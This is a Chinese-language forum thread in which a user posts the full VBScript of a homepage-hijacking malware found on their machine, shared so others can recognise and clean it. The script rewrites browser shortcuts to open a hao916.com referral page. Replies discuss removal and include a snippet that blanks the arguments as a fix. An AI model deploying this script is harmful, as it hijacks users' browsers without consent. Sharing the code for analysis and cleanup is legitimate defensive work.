主页劫持恶意vbs源代码，供大家学习之后更好的防范之用

黑色de郁金香

1. On Error Resume Next
   
2. Const link = "http://hao916.com/?r=xlrnmdebjmxx&m=d5"
   
3. Const link360 = "http://hao916.com/?r=xlrnmdebjmxx&m=d5&s=3"
   
4. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
   
5. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tulip\Desktop,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tulip\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
   
6. browsersArr = Split(browsers,",")
   
7. Set oDic = CreateObject("scripting.dictionary")
   
8. For Each browser In browsersArr
   
9.     oDic.Add LCase(browser), browser
   
10. Next
    
11. lnkpathsArr = Split(lnkpaths,",")
    
12. Set oFolders = CreateObject("scripting.dictionary")
    
13. For Each lnkpath In lnkpathsArr
    
14.     oFolders.Add lnkpath, lnkpath
    
15. Next
    
16. Set fso = CreateObject("Scripting.Filesystemobject")
    
17. Set WshShell = CreateObject("Wscript.Shell")
    
18. For Each oFolder In oFolders
    
19.     If fso.FolderExists(oFolder) Then
    
20.         For Each file In fso.GetFolder(oFolder).Files
    
21.             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
    
22.                 Set oShellLink = WshShell.CreateShortcut(file.Path)
    
23.                 path = oShellLink.TargetPath
    
24.                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
    
25.                 If oDic.Exists(LCase(name)) Then
    
26.                     If LCase(name) = LCase("360se.exe") Then
    
27.                         oShellLink.Arguments = link360
    
28.                     Else
    
29.                         oShellLink.Arguments = link
    
30.                     End If
    
31.                     If file.Attributes And 1 Then
    
32.                         file.Attributes = file.Attributes - 1
    
33.                     End If
    
34.                     oShellLink.Save
    
35.                 End If
    
36.             End If
    
37.         Next
    
38.     End If
    
39. Next

复制代码

今天发现主页被恶意篡改，于是下载wmi_tools进行清理，发现了恶意代码如下，贴上供大家参考，几乎是目录遍历，修改所有已知浏览器的快捷方式，添加hao916的站点的参数，把恶意软件的vbs源码发出来大家看了之后也好防范和清理就更加方便了，话说有没有高手用这段代码写一个反向去除这些参数，个人还在研究中，共同学习吧

tresbon

虽然不懂，学习一下。以前就发现  浏览器主页老被修改，最后格式化重新安装才搞定。

z_yj

这个有点狂妄，纯属流氓行为。
不过我很少遇到更改主页现象，就是使用那个驱动精灵会被更改，驱动完成后改回来卸载驱动精灵。

nkhk

去年就中了这种恶意程序的，半天都没有发现问题所在，百度了一下才按照你说的那种方法解决，后来还中过两三次。

12101111

                    If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = ""
                    Else
                        oShellLink.Arguments = ""
                    End If
替换掉中间的几句就成了修复工具了

p93506

虽然不懂，学习一下。

luckjun1988

受教了，对这些代码太陌生

知有

受教 学习一下

vista.

这代码是Web页面植入后感染机器？还是下载xxx.exe感染？

NetBeetle

用这个WMITools

8989494

保存成VBS,运行咋没反应?

xxeitx

VBS只有IE能解析，并且安全性很差，所以我都不用IE浏览普通网站

Kitty-Katswell

你这是直接教小白对别人进行恶意攻击

aaaaoooo

求个修复工具啊，以后主页被修改就可以修复。

zhengzwq

同求修复工具

xiazenen

就是，盼大师早日写出一个工具来。

jun57663796

vbs算是低级的了吧，现在都是驱动级的。

黑色de郁金香

12101111 发表于 2017-8-8 08:18
If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arg ...

总算遇到大神了

handsome_xiang

感谢楼主共享，学习了。

zqs0221

来学习一下，主页劫持非常讨厌